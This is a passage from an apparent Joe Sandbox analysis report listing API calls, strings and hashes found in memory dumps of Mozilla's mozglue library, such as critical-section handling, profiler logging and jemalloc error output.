                                                                  • ??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6C0B9BE0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2380687156-2178588373
                                                                  • Opcode ID: b1ffa67d2d442dd4e8febf6095650c84c2d3b7b5328401e016f72097331adbdf
                                                                  • Instruction ID: 3f11a2f0a718513e26e265c3292b99e72ebb8732d224278949120801fb67bff5
                                                                  • Opcode Fuzzy Hash: b1ffa67d2d442dd4e8febf6095650c84c2d3b7b5328401e016f72097331adbdf
                                                                  • Instruction Fuzzy Hash: 1111C232918308A78700DF288C40D9FB7F8FFD6364F008A0DFA9557640DB32A548CBA2
                                                                  APIs
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C08D9F0,00000000), ref: 6C060F1D
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C060F3C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C060F50
                                                                  • FreeLibrary.KERNEL32(?,6C08D9F0,00000000), ref: 6C060F86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoInitializeEx$combase.dll
                                                                  • API String ID: 4190559335-2063391169
                                                                  • Opcode ID: 988aafe06b8dfc47efb4b512ff413df89b98ddf074cf2a01c38edf6bb8282aca
                                                                  • Instruction ID: 952e432ceca137e3350f2c0fd2cae8158d9f92e325646113ff13fafcd7f7403e
                                                                  • Opcode Fuzzy Hash: 988aafe06b8dfc47efb4b512ff413df89b98ddf074cf2a01c38edf6bb8282aca
                                                                  • Instruction Fuzzy Hash: 17119A742592519BDF00CF69C908B4A37F8AB4B72AF00C629EE0993F81DF70B401CA5D
                                                                  APIs
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll), ref: 6C06631B
                                                                  • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C06633A
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06634E
                                                                  • FreeLibrary.KERNEL32 ref: 6C066376
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoUninitialize$combase.dll
                                                                  • API String ID: 4190559335-3846590027
                                                                  • Opcode ID: c0928a0614a05a3b29d3eddafc2f97a5896424792fefb75e594848adedf05b41
                                                                  • Instruction ID: 76e48569a70439626dd5895f52e4ea2eaf78211074628c0ec53e4c2ca93c2ea2
                                                                  • Opcode Fuzzy Hash: c0928a0614a05a3b29d3eddafc2f97a5896424792fefb75e594848adedf05b41
                                                                  • Instruction Fuzzy Hash: B20125B46193028BEF00CF6AD548B1477F8A70A659F148629DE12C3E84EF71B401CE55
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F561
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F5A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling$3JT/
                                                                  • API String ID: 2848912005-259927438
                                                                  • Opcode ID: 6a9b536829a321959ea5e14c735c35067531093c9e7defe2bb1b072318deb883
                                                                  • Instruction ID: cedd9fde72997dcd5afc145d39a111251176330ebcae8c5ad7528d31d5330632
                                                                  • Opcode Fuzzy Hash: 6a9b536829a321959ea5e14c735c35067531093c9e7defe2bb1b072318deb883
                                                                  • Instruction Fuzzy Hash: FEF05E76600204AFDE006F659C48B6A7BFDEB8A2AEF144015FE0A83701DF75B8058B65
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C09F598), ref: 6C09F621
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000,?,6C09F598), ref: 6C09F645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000,?,6C09F598), ref: 6C09F663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C09F62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 2848912005-753366533
                                                                  • Opcode ID: f47b958b89e1b182572a6943fa29d4af04da831944ae3fc550b80132cb14e3ae
                                                                  • Instruction ID: 8f22e09e312a30d7467dff99cb53852a3e763f31864de8f09cb96cef14b2bacd
                                                                  • Opcode Fuzzy Hash: f47b958b89e1b182572a6943fa29d4af04da831944ae3fc550b80132cb14e3ae
                                                                  • Instruction Fuzzy Hash: E9F05E75200304AFDE006B658C48B6A7BFDEB8A2AEF144415FE0A83741DF75B8058B65
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C060DF8), ref: 6C060E82
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C060EA1
                                                                  • __Init_thread_footer.LIBCMT ref: 6C060EB5
                                                                  • FreeLibrary.KERNEL32 ref: 6C060EC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                  • API String ID: 391052410-1680159014
                                                                  • Opcode ID: 25b93e31a947df8693cfea76e0a1f0dd16f9c22a205916b50415057bb863cddf
                                                                  • Instruction ID: c4a3e310191cbf370b5f1c9ca9afc9a51e1bd4dd377d73736c06ab5c39344872
                                                                  • Opcode Fuzzy Hash: 25b93e31a947df8693cfea76e0a1f0dd16f9c22a205916b50415057bb863cddf
                                                                  • Instruction Fuzzy Hash: 7B0124747443928BDE008FE9CA18B8633F9E706719F108525DD0583F80DF75B6048A0A
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C08CFAE,?,?,?,6C0531A7), ref: 6C0905FB
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C08CFAE,?,?,?,6C0531A7), ref: 6C090616
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0531A7), ref: 6C09061C
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0531A7), ref: 6C090627
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _writestrlen
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 2723441310-2186867486
                                                                  • Opcode ID: cd92e15726f624540f08aab5c556e6fd68eed42640c8451eabad854a5209aae2
                                                                  • Instruction ID: b59e134d387f650fc834dd894619a64dcb3614ad40356ea99519efb14fc2213b
                                                                  • Opcode Fuzzy Hash: cd92e15726f624540f08aab5c556e6fd68eed42640c8451eabad854a5209aae2
                                                                  • Instruction Fuzzy Hash: F1E08CE2A0506037F5142256BC86EBB765CDBC6134F080039FE0D83351E95ABD1A51F7
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0ADC60
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C0AD38A,?), ref: 6C0ADC6F
                                                                  • free.MOZGLUE(?,?,?,?,?,6C0AD38A,?), ref: 6C0ADCC1
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C0AD38A,?), ref: 6C0ADCE9
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C0AD38A,?), ref: 6C0ADD05
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C0AD38A,?), ref: 6C0ADD4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 1842996449-0
                                                                  • Opcode ID: 0c3d48ed49d4e497883544dc36dc726e88c49d0c62a33d9e16be05a158d15c56
                                                                  • Instruction ID: 6ac89364a7f2dd513c0897bd5cf083c075c69de500055ec0c1fbc18567829bf9
                                                                  • Opcode Fuzzy Hash: 0c3d48ed49d4e497883544dc36dc726e88c49d0c62a33d9e16be05a158d15c56
                                                                  • Instruction Fuzzy Hash: 014118B5A007169FCB04CF99C880A9AB7F5FF88314B654569DD49ABB11EB71FC01CB90
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0A0CD5
                                                                    • Part of subcall function 6C08F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C08F9A7
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0A0D40
                                                                  • free.MOZGLUE ref: 6C0A0DCB
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  • free.MOZGLUE ref: 6C0A0DDD
                                                                  • free.MOZGLUE ref: 6C0A0DF2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4069420150-2178588373
                                                                  • Opcode ID: 1fb67fb5f86779ee9b8e1987cf8d547382f9cf61d41bd4a497c7412369e363ca
                                                                  • Instruction ID: 0648a4d7d9eee83c681a10a9b8be2686e793c4d0667a06e7c31cbd16cfb33eac
                                                                  • Opcode Fuzzy Hash: 1fb67fb5f86779ee9b8e1987cf8d547382f9cf61d41bd4a497c7412369e363ca
                                                                  • Instruction Fuzzy Hash: 6A413575A0C7849BD720CF69C08039EFBE5BF88658F508A2EE8D987751D770A445CB82
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C090838
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C09084C
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C0908AF
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C0908BD
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7DC), ref: 6C0908D5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 837921583-2178588373
                                                                  • Opcode ID: d51cdc808ccb90bf24a4498af43832ee8037102e0a98830446bb4e13f78cb282
                                                                  • Instruction ID: fb37ed4f4f6cf0d2bb14249c1b691c8fb5cb40ef12115dfc0de736bb7d4af5f9
                                                                  • Opcode Fuzzy Hash: d51cdc808ccb90bf24a4498af43832ee8037102e0a98830446bb4e13f78cb282
                                                                  • Instruction Fuzzy Hash: A5218031B0924A9BEB048F65DC44BAFB7F9AF49709F540528D919A7A80DF31B904CBD0
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000104), ref: 6C05EBB5
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C08D7F3), ref: 6C05EBC3
                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C08D7F3), ref: 6C05EBD6
                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C08D7F3), ref: 6C05EBF6
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,6C08D7F3), ref: 6C05EC0E
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,6C08D7F3), ref: 6C05EC1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 2948488910-0
                                                                  • Opcode ID: fd2a0b102cd99df8cfa9b568a8c267963d069c7a71314bf28649aafcdbc3c192
                                                                  • Instruction ID: 3ec27627a17d53c129eb899c368671b1b79a8cd86d5988bb4c1218f8e8ec8c9d
                                                                  • Opcode Fuzzy Hash: fd2a0b102cd99df8cfa9b568a8c267963d069c7a71314bf28649aafcdbc3c192
                                                                  • Instruction Fuzzy Hash: 6E1129B1E042544BEB108A689D487AF3AE89B0171DF540424E865D7780E379E81487F3
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C0617B2
                                                                  • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0618EE
                                                                  • free.MOZGLUE(?), ref: 6C061911
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C06194C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3725304770-2178588373
                                                                  • Opcode ID: 9fac436ccd638ed30c981b26881c04d5fa34a6b2ed52a97821916136bb9756fc
                                                                  • Instruction ID: 38575001d1870c3d225a718a7c4f65b4254d38f890018749649c9aea6d6285f3
                                                                  • Opcode Fuzzy Hash: 9fac436ccd638ed30c981b26881c04d5fa34a6b2ed52a97821916136bb9756fc
                                                                  • Instruction Fuzzy Hash: 2281C370A152059FCB08CF69D894AAEBBF1FF89314F04452CE851ABB54DB30E954CBA2
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0B1800
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                    • Part of subcall function 6C054290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C093EBD,6C093EBD,00000000), ref: 6C0542A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                  • String ID: Details$name${marker.name} - {marker.data.name}$3JT/
                                                                  • API String ID: 46770647-88809389
                                                                  • Opcode ID: 5ccc4cf8696429f56088835e7e0b132c0fa4c781f1bbda028a9a6c243e961046
                                                                  • Instruction ID: 790913d3e77efc79b61d5ba27bd370400b08696fef468cfbdc5424ef87e8294f
                                                                  • Opcode Fuzzy Hash: 5ccc4cf8696429f56088835e7e0b132c0fa4c781f1bbda028a9a6c243e961046
                                                                  • Instruction Fuzzy Hash: 1671D0B0A003469FDB04CF28D45479ABBF5FF45304F448669D8195BB41DB71BAA8CBE2
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,6C0BB0A6,6C0BB0A6,?,6C0BAF67,?,00000010,?,6C0BAF67,?,00000010,00000000,?,?,6C0BAB1F), ref: 6C0BB1F2
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C0BB0A6,6C0BB0A6,?,6C0BAF67,?,00000010,?,6C0BAF67,?,00000010,00000000,?), ref: 6C0BB1FF
                                                                  • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C0BB0A6,6C0BB0A6,?,6C0BAF67,?,00000010,?,6C0BAF67,?,00000010), ref: 6C0BB25F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
